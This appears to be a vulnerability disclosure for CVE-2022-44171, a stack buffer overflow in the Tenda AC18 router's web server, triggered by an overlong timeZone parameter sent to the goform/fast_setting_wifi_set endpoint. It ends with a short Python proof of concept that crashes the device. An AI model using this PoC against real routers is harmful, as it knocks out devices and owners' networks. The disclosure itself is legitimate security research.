Headline
CVE-2022-44171: IoT_vuln/Tenda_AC18_V15.03.05.19_Vuln_timeZone.md at main · RobinWang825/IoT_vuln
Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via function form_fast_setting_wifi_set.
Permalink
Cannot retrieve contributors at this time
Tenda AC18(V15.03.05.19) has a Stack Buffer Overflow Vulnerability****Product
- product information: https://www.tenda.com.cn/
- firmware download: https://www.tenda.com.cn/download/detail-2683.html
Affected version
V15.03.05.19
Vulnerability
The stack overfow vulnerability is in /bin/httpd. The vulnerability occurrs in the form_fast_setting_wifi_set function, which can be accessed through the URL goform/fast_setting_wifi_set .
This function accepts the POST parameter timeZone, does not verify its length, and copies it directly to a local variable on the stack, causing a stack overflow. This vulnerability allows attackers to cause a Denial of Service (DoS).
PoC
Poc of Denial of Service(DoS)
import requests pl = b"A"*0x100 + b":" + b"A"*0x400 data = { b"ssid": b’A’, b"timeZone": pl } res = requests.post("http://192.168.0.1/goform/fast_setting_wifi_set", data=data) print(res.content)